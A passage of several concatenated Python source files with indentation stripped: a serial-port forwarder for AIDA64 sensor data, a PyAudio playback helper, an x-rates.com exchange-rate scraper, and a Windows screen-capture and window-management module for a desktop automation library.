pass
def read(self,len):
if(self.IsSerialOpen):
try:
return self.hander.read(len).decode("gbk")
except Exception as e:
print("[read]---异常---:", e)
pass
return ""
def print(self,buf):
if(self.IsSerialOpen):
try:
result = self.hander.write(buf.encode("gbk"))#写数据
except Exception as e:
print("[print]---异常---:", e)
return -1
return result
return -1
def write(self,buf):
if(self.IsSerialOpen):
try:
result = self.hander.write(bytes.fromhex(buf))#写数据
except Exception as e:
print("[write]---异常---:", e)
return -1
return result
return -1
def stute(self):
return self.IsSerialOpen
pass
pass
def GetMemory():
try:
with contextlib.closing(mmap.mmap(-1, 1024, tagname='AIDA64_SensorValues', access=mmap.ACCESS_READ)) as m:
s = m.read(40960)
Sdata = s.decode('UTF-8', 'ignore').strip().strip(b'\x00'.decode())
Stu = 1
if(Sdata == ''):
Stu = 0
Sdata = 'NULL'
except Exception as e:
Stu = 0
Sdata = "ERROR : %s"
return Stu,Sdata
TheSerial = pySerial()
#task
def TaskSerial():
while True:
Res,Sdata = GetMemory()
if (Res == 1):
temp = f'<root>{Sdata}</root>'
xs = xmltodict.parse(temp)
data = {'Msg':'OK','Result': xs}
else:
data = {'Msg':'Fail','Result': Sdata}
pass
TheSerial.write("a0")
TheSerial.print(json.dumps(data))
TheSerial.print("\n")
time.sleep(2)
pass
pass
def main():
argc = len(sys.argv)
if(argc != 3):
win32api.MessageBox(0, "use :\" python <fileName> <PORTX> <BPS> \"", "error",win32con.MB_OK)
#print("use :\" python <fileName> <PORTX> <BPS> <HTTPPORT>\"")
#print("like pythonw file.pyw COM3 115200 8888")
return
serOpen = TheSerial.begin(sys.argv[1],int(sys.argv[2]))
if(serOpen == False):
win32api.MessageBox(0, "Serial Open Error", "error",win32con.MB_OK)
win32api.MessageBox(0, "use :\" python <fileName> <PORTX> <BPS>\"", "error",win32con.MB_OK)
#print("use :\" python <fileName> <PORTX> <BPS> <HTTPPORT>\"")
#print("like pythonw file.pyw COM3 115200 8888")
return
win32api.MessageBox(0, "Serial Open OK" , "Info",win32con.MB_OK)
try:
threadUPD = threading.Thread(target=TaskSerial)
threadUPD.setDaemon(True) # thread1,它做为程序主线程的守护线程,当主线程退出时,thread1线程也会退出,由thread1启动的其它子线程会同时退出,不管是否执行完任务
threadUPD.start()
except:
print("---异常---: 无法启动线程TaskSerial")
pass
if __name__ == '__main__':
main()
while(True):
inS = input()
if(inS == 'exit'):
TheSerial.end()
break
pass
#pid = os.getpid()
#os.popen('taskkill.exe /pid:'+str(pid)) LIl1i O0o
|
sndplay.py
|
import time
import threading
import numpy as np
__all__ = ['play']
# FIXME this really should be a class Player
def _play(snd, starttime, endtime, frames_per_buffer=1024*10):
import pyaudio # here so that we only import dependency when really used
startindex = int(np.round(snd.fs*starttime))
endindex = int(np.round(snd.fs*endtime))
snd.curpos = startindex
snd._playing = True
snd._stop_playing = False
def callback(in_data, frame_count, time_info, status):
startframe = min(snd.curpos, endindex)
endframe = min(startframe + frame_count, endindex)
data = snd.read_frames(startframe=startframe, endframe=endframe).astype(np.float32).tostring()
snd.curpos = endframe
if snd._stop_playing:
callback_flag = pyaudio.paComplete
else:
callback_flag = pyaudio.paContinue
return (data, callback_flag)
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,
channels=snd.nchannels,
rate=int(snd.fs),
output=True,
stream_callback=callback,
frames_per_buffer=frames_per_buffer)
with snd.open():
stream.start_stream()
while stream.is_active():
time.sleep(0.1)
stream.stop_stream()
stream.close()
p.terminate()
snd._playing = False
def play(snd, starttime, endtime):
thread = threading.Thread(target=_play, args=(snd, starttime, endtime))
thread.start()
|
x-rates.py
|
# -*- coding: utf-8 -*-
'''
x-rates
'''
__author__ = 'Libao Jin'
__date__ = 'Aug 31, 2015'
import urllib.parse
import urllib.request
import re
import csv
import time
import os
import threading
import numpy as np
def format_date(date):
year, month, day = date
date = str(year).zfill(2) + '-' + str(month).zfill(2) + '-' + str(day).zfill(2)
return date
def is_leap_year(year):
if year % 400 == 0:
return True
elif year % 100 != 0 and year % 4 == 0:
return True
else:
return False
def days_in_year(date):
year, month, day = date
months = range(1, month)
days = 0
for m in months:
days += days_of_month(year, m)
days += day
return days
def days_in_year_reversed(date):
days = days_of_year(date[0]) - days_in_year(date)
return days
def days_of_year(year):
if is_leap_year(year):
days = 366
else:
days = 365
return days
def days_of_month(year, month):
if month in [1, 3, 5, 7, 8, 10, 12]:
days = 31
elif month in [4, 6, 9, 11]:
days = 30
else:
if is_leap_year(year):
days = 29
else:
days = 28
return days
def make_date_range(s_date, e_date):
s_year, s_month, s_day = s_date
e_year, e_month, e_day = e_date
years = range(s_year, e_year + 1)
days = 0
if len(years) == 1:
days = days_in_year(e_date) - days_in_year(s_date)
elif len(years) > 1:
for y in years:
if y == s_year:
days += days_in_year_reversed(s_date)
elif y == e_year:
days += days_in_year(e_date)
else:
days += days_of_year(y)
dates = []
dates.append(format_date(s_date))
while days > 0:
days_bound = days_of_month(s_year, s_month)
if s_day + 1 <= days_bound:
s_day += 1
elif s_day + 1 > days_bound:
s_day = 1
if s_month + 1 <= 12:
s_month += 1
else:
s_month = 1
s_year += 1
s_date = (s_year, s_month, s_day)
dates.append(format_date(s_date))
days -= 1
return dates
def get_xrates():
'visit x-rates site and grab the exchange rate'
except_time = 0
url = 'http://www.x-rates.com/table/'
values = {'from': 'CNY', 'amount':'1'}
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
headers = { 'User-Agent' : user_agent}
data = urllib.parse.urlencode(values)
data = data.encode('utf-8') # data should be bytes
req = urllib.request.Request(url, data, headers)
try:
with urllib.request.urlopen(req) as response:
the_page = response.read().decode('utf-8')
return the_page
except urllib.error.URLError:
except_time += 1
if except_time < 2:
print('Error! Try again.')
the_page = get_xrates()
return the_page
else:
print('Error! Pass.')
return None
def get_xrates_by_date(search_date):
'visit x-rates site and grab the exchange rate'
except_time = 0
url = 'http://www.x-rates.com/historical/?date={0}&amount=1&from=CNY'.format(search_date)
req = urllib.request.Request(url)
try:
with urllib.request.urlopen(req) as response:
the_page = response.read().decode('utf-8')
return the_page
except urllib.error.URLError:
except_time += 1
if except_time < 2:
print('Error! Try to access {} again.'.format(search_date))
the_page = get_xrates_by_date(search_date)
return the_page
else:
print('Error! Pass {}.'.format(search_date))
return None
#def get_xrates_by_date2(search_date):
#'visit x-rates site and grab the exchange rate'
#url = 'http://www.x-rates.com/historical/'
#values = {'date': search_date, 'amount': '1','from': 'CNY'}
#user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
#headers = { 'User-Agent' : user_agent}
#data = urllib.parse.urlencode(values)
#data = data.encode("utf-8") # data should be bytes
#req = urllib.request.Request(url, data, headers)
#with urllib.request.urlopen(req) as response:
#the_page = response.read().decode('utf-8')
#return the_page
def save_page(local_file, the_page):
'save the page into local files'
f = open(local_file, 'w+', encoding = 'utf-8')
f.write(the_page)
f.close()
def combine_data(folder):
os.chdir(folder)
files = os.listdir('.')
ext_filter = '.*\.csv'
p = re.compile(ext_filter)
csv_files = []
for f in files:
m = p.match(f)
if m:
csv_files.append(m.group())
else:
continue
print(csv_files)
header = ['Time']
total_data = r'..\x-rates_all.csv'
td = open(total_data, 'w+', encoding = 'utf-8')
for i, cf in enumerate(csv_files):
data = {}
with open(cf, 'r', encoding = 'utf-8') as f:
csv_reader = csv.DictReader(f)
for row in csv_reader:
if i < 1:
header.append(row['Country'])
data['Time'] = row['Time']
data[row['Country']] = row['To']
if i < 1:
csv_writer = csv.DictWriter(td, fieldnames = header)
csv_writer.writeheader()
csv_writer.writerow(data)
print(i, cf)
td.close()
os.chdir('..')
def parse_data(the_page, current_time, folder):
pattern = '^\t*<td.*?>(<a.*?>)?(.*?)<\/.*>'
p = re.compile(pattern, re.M)
m = p.findall(the_page)
data = []
if m is not None:
for i,e in enumerate(m):
#print(i, e[1])
if i < 30:
continue
if i % 3 == 0:
sub_data = {}
sub_data['Time'] = current_time
sub_data['Country'] = e[1]
#sub_data = []
#sub_data.append(e[1])
elif i % 3 == 1:
sub_data['From'] = e[1]
elif i % 3 == 2:
sub_data['To'] = e[1]
data.append(sub_data)
outputfile= folder + r'\x-rates_' + current_time + '.csv'
csvfileout = open(outputfile, 'w+')
headers = ['Country', 'From', 'To', 'Time']
cw = csv.DictWriter(csvfileout, fieldnames = headers)
cw.writeheader()
for d in data:
if d['Country'] == 'US Dollar':
print(current_time, d['Country'], d['To'])
cw.writerow(d)
csvfileout.close()
return data
def do_task(current_time, folder):
the_page = get_xrates()
#local_file = 'x-rates.html'
#save_page(local_file, the_page)
parse_data(the_page, current_time, folder)
def do_task_by_date(s_date = (2005, 1, 1), e_date = (2015, 8, 30)):
folder = 'daily'
dates = make_date_range(s_date, e_date)
for date in dates:
the_page = get_xrates_by_date(date)
parse_data(the_page, date, folder)
#time.sleep(1)
def do_task_repeatedly(period=60):
folder = 'data'
while True:
ct = time.gmtime()
current_time = convert_time(ct)
do_task(current_time, folder)
time.sleep(period)
def convert_time(ct):
s = str(ct.tm_year).zfill(2) + '-' + str(ct.tm_mon).zfill(2) + '-' + str(ct.tm_mday).zfill(2) + '_' + str(ct.tm_hour).zfill(2) + '-' + str(ct.tm_min).zfill(2) + '-' + str(ct.tm_sec).zfill(2)
return s
def clean_folder():
files = os.listdir()
print(files)
pattern = '[-.a-zA-Z0-9]*~'
p = re.compile(pattern)
to_delete = []
print('Files have been removed:')
for f in files:
m = p.match(f)
if m:
trash_file = m.group()
print(trash_file)
to_delete.append(trash_file)
os.remove(trash_file)
else:
continue
def thread1():
#t1 = threading.Thread(target = do_task_by_date, args = ((2005, 1, 1), (2005, 12, 31)))
t1 = threading.Thread(target = check_files, args = ((2015, 1, 1), (2015, 3, 1)))
t2 = threading.Thread(target = check_files, args = ((2015, 3, 1), (2015, 5, 1)))
t3 = threading.Thread(target = check_files, args = ((2015, 5, 1), (2015, 7, 1)))
t4 = threading.Thread(target = check_files, args = ((2015, 7, 1), (2015, 8, 31)))
t1.start()
print('Thread-1 started.')
t2.start()
print('Thread-2 started.')
t3.start()
print('Thread-3 started.')
t4.start()
print('Thread-4 started.')
def check_files(s_date, e_date):
dates = make_date_range(s_date, e_date)
folder = r'.\daily\3kb'
files = os.listdir(folder)
#print(files)
not_exist_dates = []
for d in dates:
n = 'x-rates_' + d + '.csv'
if n not in files:
not_exist_dates.append(d)
#print(d)
print(len(not_exist_dates))
folder = 'daily'
for date in not_exist_dates:
the_page = get_xrates_by_date(date)
parse_data(the_page, date, folder)
time.sleep(1)
if __name__ == '__main__':
clean_folder()
#thread1()
#combine_data(r'.\daily\3kb')
do_task_repeatedly()
|
PlatformManagerWindows.py
|
""" Platform-specific code for Windows is encapsulated in this module. """
import os
import re
import time
import numpy
import ctypes
import threading
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
from ctypes import wintypes
from PIL import Image, ImageTk, ImageOps
from .SettingsDebug import Debug
# Python 3 compatibility
try:
basestring
except NameError:
basestring = str
try:
unicode
except:
unicode = str
class PlatformManagerWindows(object):
""" Abstracts Windows-specific OS-level features """
def __init__(self):
#self._root = tk.Tk()
#self._root.overrideredirect(1)
#self._root.withdraw()
user32 = ctypes.WinDLL('user32', use_last_error=True)
gdi32 = ctypes.WinDLL('gdi32', use_last_error=True)
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
psapi = ctypes.WinDLL('psapi', use_last_error=True)
self._user32 = user32
self._gdi32 = gdi32
self._kernel32 = kernel32
self._psapi = psapi
# Pay attention to different screen DPI settings
self._user32.SetProcessDPIAware()
# Mapping to `keyboard` names
self._SPECIAL_KEYCODES = {
"BACKSPACE": "backspace",
"TAB": "tab",
"CLEAR": "clear",
"ENTER": "enter",
"SHIFT": "shift",
"CTRL": "ctrl",
"ALT": "alt",
"PAUSE": "pause",
"CAPS_LOCK": "caps lock",
"ESC": "esc",
"SPACE": "spacebar",
"PAGE_UP": "page up",
"PAGE_DOWN": "page down",
"END": "end",
"HOME": "home",
"LEFT": "left arrow",
"UP": "up arrow",
"RIGHT": "right arrow",
"DOWN": "down arrow",
"SELECT": "select",
"PRINT": "print",
"PRINTSCREEN": "print screen",
"INSERT": "ins",
"DELETE": "del",
"WIN": "win",
"CMD": "win",
"META": "win",
"NUM0": "keypad 0",
"NUM1": "keypad 1",
"NUM2": "keypad 2",
"NUM3": "keypad 3",
"NUM4": "keypad 4",
"NUM5": "keypad 5",
"NUM6": "keypad 6",
"NUM7": "keypad 7",
"NUM8": "keypad 8",
"NUM9": "keypad 9",
"NUM9": "keypad 9",
"SEPARATOR": 83,
"ADD": 78,
"MINUS": 74,
"MULTIPLY": 55,
"DIVIDE": 53,
"F1": "f1",
"F2": "f2",
"F3": "f3",
"F4": "f4",
"F5": "f5",
"F6": "f6",
"F7": "f7",
"F8": "f8",
"F9": "f9",
"F10": "f10",
"F11": "f11",
"F12": "f12",
"F13": "f13",
"F14": "f14",
"F15": "f15",
"F16": "f16",
"NUM_LOCK": "num lock",
"SCROLL_LOCK": "scroll lock",
}
self._REGULAR_KEYCODES = {
"0": "0",
"1": "1",
"2": "2",
"3": "3",
"4": "4",
"5": "5",
"6": "6",
"7": "7",
"8": "8",
"9": "9",
"a": "a",
"b": "b",
"c": "c",
"d": "d",
"e": "e",
"f": "f",
"g": "g",
"h": "h",
"i": "i",
"j": "j",
"k": "k",
"l": "l",
"m": "m",
"n": "n",
"o": "o",
"p": "p",
"q": "q",
"r": "r",
"s": "s",
"t": "t",
"u": "u",
"v": "v",
"w": "w",
"x": "x",
"y": "y",
"z": "z",
";": ";",
"=": "=",
",": ",",
"-": "-",
".": ".",
"/": "/",
"`": "`",
"[": "[",
"\\": "\\",
"]": "]",
"'": "'",
" ": " ",
}
self._UPPERCASE_KEYCODES = {
"~": "`",
"+": "=",
")": "0",
"!": "1",
"@": "2",
"#": "3",
"$": "4",
"%": "5",
"^": "6",
"&": "7",
"*": "8",
"(": "9",
"A": "a",
"B": "b",
"C": "c",
"D": "d",
"E": "e",
"F": "f",
"G": "g",
"H": "h",
"I": "i",
"J": "j",
"K": "k",
"L": "l",
"M": "m",
"N": "n",
"O": "o",
"P": "p",
"Q": "q",
"R": "r",
"S": "s",
"T": "t",
"U": "u",
"V": "v",
"W": "w",
"X": "x",
"Y": "y",
"Z": "z",
":": ";",
"<": ",",
"_": "-",
">": ".",
"?": "/",
"|": "\\",
"\"": "'",
"{": "[",
"}": "]",
}
def _check_count(self, result, func, args):
#pylint: disable=unused-argument
""" Private function to return ctypes errors cleanly """
if result == 0:
raise ctypes.WinError(ctypes.get_last_error())
return args
## Screen functions
def getBitmapFromRect(self, x, y, w, h):
""" Capture the specified area of the (virtual) screen. """
min_x, min_y, screen_width, screen_height = self._getVirtualScreenRect()
img = self._getVirtualScreenBitmap()
# Limit the coordinates to the virtual screen
# Then offset so 0,0 is the top left corner of the image
# (Top left of virtual screen could be negative)
x1 = min(max(min_x, x), min_x+screen_width) - min_x
y1 = min(max(min_y, y), min_y+screen_height) - min_y
x2 = min(max(min_x, x+w), min_x+screen_width) - min_x
y2 = min(max(min_y, y+h), min_y+screen_height) - min_y
return numpy.array(img.crop((x1, y1, x2, y2)))
def getScreenBounds(self, screenId):
""" Returns the screen size of the specified monitor (0 being the main monitor). """
screen_details = self.getScreenDetails()
if not isinstance(screenId, int) or screenId < -1 or screenId >= len(screen_details):
raise ValueError("Invalid screen ID")
if screenId == -1:
# -1 represents the entire virtual screen
return self._getVirtualScreenRect()
return screen_details[screenId]["rect"]
def getScreenDetails(self):
""" Return list of attached monitors
For each monitor (as dict), ``monitor["rect"]`` represents the screen as positioned
in virtual screen. List is returned in device order, with the first element (0)
representing the primary monitor.
"""
monitors = self._getMonitorInfo()
primary_screen = None
screens = []
for monitor in monitors:
# Convert screen rect to Lackey-style rect (x,y,w,h) as position in virtual screen
screen = {
"rect": (
monitor["rect"][0],
monitor["rect"][1],
monitor["rect"][2] - monitor["rect"][0],
monitor["rect"][3] - monitor["rect"][1]
)
}
screens.append(screen)
return screens
def isPointVisible(self, x, y):
""" Checks if a point is visible on any monitor. """
class POINT(ctypes.Structure):
_fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]
pt = POINT()
pt.x = x
pt.y = y
MONITOR_DEFAULTTONULL = 0
hmon = self._user32.MonitorFromPoint(pt, MONITOR_DEFAULTTONULL)
if hmon == 0:
return False
return True
def _captureScreen(self, device_name):
""" Captures a bitmap from the given monitor device name
Returns as a PIL Image (BGR rather than RGB, for compatibility with OpenCV)
"""
## Define constants/structs
class HBITMAP(ctypes.Structure):
_fields_ = [("bmType", ctypes.c_long),
("bmWidth", ctypes.c_long),
("bmHeight", ctypes.c_long),
("bmWidthBytes", ctypes.c_long),
("bmPlanes", ctypes.wintypes.WORD),
("bmBitsPixel", ctypes.wintypes.WORD),
("bmBits", ctypes.wintypes.LPVOID)]
class BITMAPINFOHEADER(ctypes.Structure):
_fields_ = [("biSize", ctypes.wintypes.DWORD),
("biWidth", ctypes.c_long),
("biHeight", ctypes.c_long),
("biPlanes", ctypes.wintypes.WORD),
("biBitCount", ctypes.wintypes.WORD),
("biCompression", ctypes.wintypes.DWORD),
("biSizeImage", ctypes.wintypes.DWORD),
("biXPelsPerMeter", ctypes.c_long),
("biYPelsPerMeter", ctypes.c_long),
("biClrUsed", ctypes.wintypes.DWORD),
("biClrImportant", ctypes.wintypes.DWORD)]
class BITMAPINFO(ctypes.Structure):
_fields_ = [("bmiHeader", BITMAPINFOHEADER),
("bmiColors", ctypes.wintypes.DWORD*3)]
HORZRES = ctypes.c_int(8)
VERTRES = ctypes.c_int(10)
SRCCOPY = 0x00CC0020
CAPTUREBLT = 0x40000000
DIB_RGB_COLORS = 0
## Begin logic
self._gdi32.CreateDCW.restype = ctypes.c_void_p
hdc = self._gdi32.CreateDCW(ctypes.c_wchar_p(str(device_name)), 0, 0, 0) # Convert to bytestring for c_wchar_p type
if hdc == 0:
raise ValueError("Empty hdc provided")
# Get monitor specs
self._gdi32.GetDeviceCaps.argtypes = [ctypes.c_void_p, ctypes.c_int]
screen_width = self._gdi32.GetDeviceCaps(hdc, HORZRES)
screen_height = self._gdi32.GetDeviceCaps(hdc, VERTRES)
# Create memory device context for monitor
self._gdi32.CreateCompatibleDC.restype = ctypes.c_void_p
self._gdi32.CreateCompatibleDC.argtypes = [ctypes.c_void_p]
hCaptureDC = self._gdi32.CreateCompatibleDC(hdc)
if hCaptureDC == 0:
raise WindowsError("gdi:CreateCompatibleDC failed")
# Create bitmap compatible with monitor
self._gdi32.CreateCompatibleBitmap.restype = ctypes.c_void_p
self._gdi32.CreateCompatibleBitmap.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]
hCaptureBmp = self._gdi32.CreateCompatibleBitmap(hdc, screen_width, screen_height)
if hCaptureBmp == 0:
raise WindowsError("gdi:CreateCompatibleBitmap failed")
# Select hCaptureBmp into hCaptureDC device context
self._gdi32.SelectObject.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
self._gdi32.SelectObject(hCaptureDC, hCaptureBmp)
# Perform bit-block transfer from screen to device context (and thereby hCaptureBmp)
self._gdi32.BitBlt.argtypes = [
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_int,
ctypes.c_int,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_int,
ctypes.c_ulong
]
self._gdi32.BitBlt(hCaptureDC, 0, 0, screen_width, screen_height, hdc, 0, 0, SRCCOPY | CAPTUREBLT)
# Capture image bits from bitmap
img_info = BITMAPINFO()
img_info.bmiHeader.biSize = ctypes.sizeof(BITMAPINFOHEADER)
img_info.bmiHeader.biWidth = screen_width
img_info.bmiHeader.biHeight = screen_height
img_info.bmiHeader.biPlanes = 1
img_info.bmiHeader.biBitCount = 32
img_info.bmiHeader.biCompression = 0
img_info.bmiHeader.biClrUsed = 0
img_info.bmiHeader.biClrImportant = 0
buffer_length = screen_width * 4 * screen_height
image_data = ctypes.create_string_buffer(buffer_length)
self._gdi32.GetDIBits.restype = ctypes.c_int
self._gdi32.GetDIBits.argtypes = [
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_uint,
ctypes.c_uint,
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_uint
]
scanlines = self._gdi32.GetDIBits(
hCaptureDC,
hCaptureBmp,
0,
screen_height,
ctypes.byref(image_data),
ctypes.byref(img_info),
DIB_RGB_COLORS)
if scanlines != screen_height:
raise WindowsError("gdi:GetDIBits failed")
final_image = ImageOps.flip(
Image.frombuffer(
"RGBX",
(screen_width, screen_height),
image_data,
"raw",
"RGBX",
0,
1))
# Destroy created device context & GDI bitmap
self._gdi32.DeleteObject.argtypes = [ctypes.c_void_p]
self._gdi32.DeleteObject(hdc)
self._gdi32.DeleteObject(hCaptureDC)
self._gdi32.DeleteObject(hCaptureBmp)
return final_image
def _getMonitorInfo(self):
""" Returns info about the attached monitors, in device order
[0] is always the primary monitor
"""
monitors = []
CCHDEVICENAME = 32
def _MonitorEnumProcCallback(hMonitor, hdcMonitor, lprcMonitor, dwData):
class MONITORINFOEX(ctypes.Structure):
_fields_ = [("cbSize", ctypes.wintypes.DWORD),
("rcMonitor", ctypes.wintypes.RECT),
("rcWork", ctypes.wintypes.RECT),
("dwFlags", ctypes.wintypes.DWORD),
("szDevice", ctypes.wintypes.WCHAR*CCHDEVICENAME)]
lpmi = MONITORINFOEX()
lpmi.cbSize = ctypes.sizeof(MONITORINFOEX)
self._user32.GetMonitorInfoW(hMonitor, ctypes.byref(lpmi))
#hdc = self._gdi32.CreateDCA(ctypes.c_char_p(lpmi.szDevice), 0, 0, 0)
monitors.append({
"hmon": hMonitor,
#"hdc": hdc,
"rect": (lprcMonitor.contents.left,
lprcMonitor.contents.top,
lprcMonitor.contents.right,
lprcMonitor.contents.bottom),
"name": lpmi.szDevice
})
return True
MonitorEnumProc = ctypes.WINFUNCTYPE(
ctypes.c_bool,
ctypes.c_ulong,
ctypes.c_ulong,
ctypes.POINTER(ctypes.wintypes.RECT),
ctypes.c_int)
callback = MonitorEnumProc(_MonitorEnumProcCallback)
if self._user32.EnumDisplayMonitors(0, 0, callback, 0) == 0:
raise WindowsError("Unable to enumerate monitors")
# Clever magic to make the screen with origin of (0,0) [the primary monitor]
# the first in the list
# Sort by device ID - 0 is primary, 1 is next, etc.
monitors.sort(key=lambda x: (not (x["rect"][0] == 0 and x["rect"][1] == 0), x["name"]))
return monitors
def _getVirtualScreenRect(self):
""" The virtual screen is the bounding box containing all monitors.
Not all regions in the virtual screen are actually visible. The (0,0) coordinate
is the top left corner of the primary screen rather than the whole bounding box, so
some regions of the virtual screen may have negative coordinates if another screen
is positioned in Windows as further to the left or above the primary screen.
Returns the rect as (x, y, w, h)
"""
SM_XVIRTUALSCREEN = 76 # Left of virtual screen
SM_YVIRTUALSCREEN = 77 # Top of virtual screen
SM_CXVIRTUALSCREEN = 78 # Width of virtual screen
SM_CYVIRTUALSCREEN = 79 # Height of virtual screen
return (self._user32.GetSystemMetrics(SM_XVIRTUALSCREEN), \
self._user32.GetSystemMetrics(SM_YVIRTUALSCREEN), \
self._user32.GetSystemMetrics(SM_CXVIRTUALSCREEN), \
self._user32.GetSystemMetrics(SM_CYVIRTUALSCREEN))
def _getVirtualScreenBitmap(self):
""" Returns a PIL bitmap (BGR channel order) of all monitors
Arranged like the Virtual Screen
"""
# Collect information about the virtual screen & monitors
min_x, min_y, screen_width, screen_height = self._getVirtualScreenRect()
monitors = self._getMonitorInfo()
# Initialize new black image the size of the virtual screen
virt_screen = Image.new("RGB", (screen_width, screen_height))
# Capture images of each of the monitors and overlay on the virtual screen
for monitor_id in range(0, len(monitors)):
img = self._captureScreen(monitors[monitor_id]["name"])
# Capture virtscreen coordinates of monitor
x1, y1, x2, y2 = monitors[monitor_id]["rect"]
# Convert to image-local coordinates
x = x1 - min_x
y = y1 - min_y
# Paste on the virtual screen
virt_screen.paste(img, (x, y))
return virt_screen
## Clipboard functions
def osCopy(self):
""" Triggers the OS "copy" keyboard shortcut """
from .InputEmulation import Keyboard
k = Keyboard()
k.keyDown("{CTRL}")
k.type("c")
k.keyUp("{CTRL}")
def osPaste(self):
""" Triggers the OS "paste" keyboard shortcut """
from .InputEmulation import Keyboard
k = Keyboard()
k.keyDown("{CTRL}")
k.type("v")
k.keyUp("{CTRL}")
## Window functions
def getWindowByTitle(self, wildcard, order=0):
""" Returns a handle for the first window that matches the provided "wildcard" regex """
EnumWindowsProc = ctypes.WINFUNCTYPE(
ctypes.c_bool,
ctypes.POINTER(ctypes.c_int),
ctypes.py_object)
def callback(hwnd, context):
if ctypes.windll.user32.IsWindowVisible(hwnd):
length = ctypes.windll.user32.GetWindowTextLengthW(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
ctypes.windll.user32.GetWindowTextW(hwnd, buff, length + 1)
if re.search(context["wildcard"], buff.value, flags=re.I) != None and not context["handle"]:
if context["order"] > 0:
context["order"] -= 1
else:
context["handle"] = hwnd
return True
data = {"wildcard": wildcard, "handle": None, "order": order}
ctypes.windll.user32.EnumWindows(EnumWindowsProc(callback), ctypes.py_object(data))
return data["handle"]
def getWindowByPID(self, pid, order=0):
""" Returns a handle for the first window that matches the provided PID """
if pid <= 0:
return None
EnumWindowsProc = ctypes.WINFUNCTYPE(
ctypes.c_bool,
ctypes.POINTER(ctypes.c_int),
ctypes.py_object)
def callback(hwnd, context):
if ctypes.windll.user32.IsWindowVisible(hwnd):
pid = ctypes.c_long()
ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
if context["pid"] == int(pid.value) and not context["handle"]:
if context["order"] > 0:
context["order"] -= 1
else:
context["handle"] = hwnd
return True
data = {"pid": pid, "handle": None, "order": order}
ctypes.windll.user32.EnumWindows(EnumWindowsProc(callback), ctypes.py_object(data))
return data["handle"]
def getWindowRect(self, hwnd):
""" Returns a rect (x,y,w,h) for the specified window's area """
rect = ctypes.wintypes.RECT()
if ctypes.windll.user32.GetWindowRect(hwnd, ctypes.byref(rect)):
x1 = rect.left
y1 = rect.top
x2 = rect.right
y2 = rect.bottom
return (x1, y1, x2-x1, y2-y1)
return None
def focusWindow(self, hwnd):
""" Brings specified window to the front """
Debug.log(3, "Focusing window: " + str(hwnd))
SW_RESTORE = 9
if ctypes.windll.user32.IsIconic(hwnd):
ctypes.windll.user32.ShowWindow(hwnd, SW_RESTORE)
ctypes.windll.user32.SetForegroundWindow(hwnd)
def getWindowTitle(self, hwnd):
""" Gets the title for the specified window """
length = ctypes.windll.user32.GetWindowTextLengthW(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
ctypes.windll.user32.GetWindowTextW(hwnd, buff, length + 1)
return buff.value
def getWindowPID(self, hwnd):
""" Gets the process ID that the specified window belongs to """
pid = ctypes.c_long()
ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
return int(pid.value)
def getForegroundWindow(self):
""" Returns a handle to the window in the foreground """
return self._user32.GetForegroundWindow()
## Highlighting functions
def highlight(self, rect, color="red", seconds=None):
""" Simulates a transparent rectangle over the specified ``rect`` on the screen.
Actually takes a screenshot of the region and displays with a
rectangle border in a borderless window (due to Tkinter limitations)
If a Tkinter root window has already been created somewhere else,
uses that instead of creating a new one.
"""
if tk._default_root is None:
Debug.log(3, "Creating new temporary Tkinter root")
temporary_root = True
root = tk.Tk()
root.withdraw()
else:
Debug.log(3, "Borrowing existing Tkinter root")
temporary_root = False
root = tk._default_root
image_to_show = self.getBitmapFromRect(*rect)
app = highlightWindow(root, rect, color, image_to_show)
if seconds == 0:
t = threading.Thread(target=app.do_until_timeout)
t.start()
return app
app.do_until_timeout(seconds)
## Process functions
def isPIDValid(self, pid):
""" Checks if a PID is associated with a running process """
## Slightly copied wholesale from http://stackoverflow.com/questions/568271/how-to-check-if-there-exists-a-process-with-a-given-pid
## Thanks to http://stackoverflow.com/users/1777162/ntrrgc and http://stackoverflow.com/users/234270/speedplane
class ExitCodeProcess(ctypes.Structure):
_fields_ = [('hProcess', ctypes.c_void_p),
('lpExitCode', ctypes.POINTER(ctypes.c_ulong))]
SYNCHRONIZE = 0x100000
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
process = self._kernel32.OpenProcess(SYNCHRONIZE|PROCESS_QUERY_LIMITED_INFORMATION, 0, pid)
if not process:
return False
ec = ExitCodeProcess()
out = self._kernel32.GetExitCodeProcess(process, ctypes.byref(ec))
if not out:
err = self._kernel32.GetLastError()
if self._kernel32.GetLastError() == 5:
# Access is denied.
logging.warning("Access is denied to get pid info.")
self._kernel32.CloseHandle(process)
return False
elif bool(ec.lpExitCode):
# There is an exit code, it quit
self._kernel32.CloseHandle(process)
return False
# No exit code, it's running.
self._kernel32.CloseHandle(process)
return True
def killProcess(self, pid):
""" Kills the process with the specified PID (if possible) """
SYNCHRONIZE = 0x00100000
PROCESS_TERMINATE = 0x0001
hProcess = self._kernel32.OpenProcess(SYNCHRONIZE|PROCESS_TERMINATE, True, pid)
result = self._kernel32.TerminateProcess(hProcess, 0)
self._kernel32.CloseHandle(hProcess)
def getProcessName(self, pid):
if pid <= 0:
return ""
MAX_PATH_LEN = 2048
proc_name = ctypes.create_string_buffer(MAX_PATH_LEN)
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
hProcess = self._kernel32.OpenProcess(PROCESS_VM_READ|PROCESS_QUERY_INFORMATION, 0, pid)
#self._psapi.GetProcessImageFileName.restype = ctypes.wintypes.DWORD
self._psapi.GetModuleFileNameExA(hProcess, 0, ctypes.byref(proc_name), MAX_PATH_LEN)
